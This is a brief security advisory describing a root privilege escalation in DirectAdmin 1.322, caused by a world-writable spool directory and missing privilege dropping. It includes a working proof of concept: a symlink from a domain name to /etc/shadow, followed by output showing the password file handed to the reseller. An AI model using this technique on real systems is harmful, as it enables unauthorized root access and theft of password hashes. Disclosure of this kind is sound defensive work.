DirectAdmin 1.322 - resellers can take control of any file



DESCRIPTION


The /var/spool/virtual directory was given permissions of 0777, allowing anyone with access to the box to write to that location. When a new account was created in DirectAdmin, the name of the domain for the newly created account was written there as a directory. DirectAdmin failed to drop privileges from root when performing this task, allowing a reseller to create a link from the directory name to any location on the filesystem. When the new account was created, the reseller would then have full access to the resource being linked to.



IMPACT


Resellers could obtain full root privileges.


[user@host ~]$ cd /var/spool/virtual
[user@host /var/spool/virtual]$ ln -s /etc/shadow example.com


Next, the reseller logs into DirectAdmin and creates a new account for the domain "example.com". This is the result:

[user@host ~]$ ls -l /etc/shadow
-rwxrwx---  1 example mail 1076 Sep  3 02:49 /etc/shadow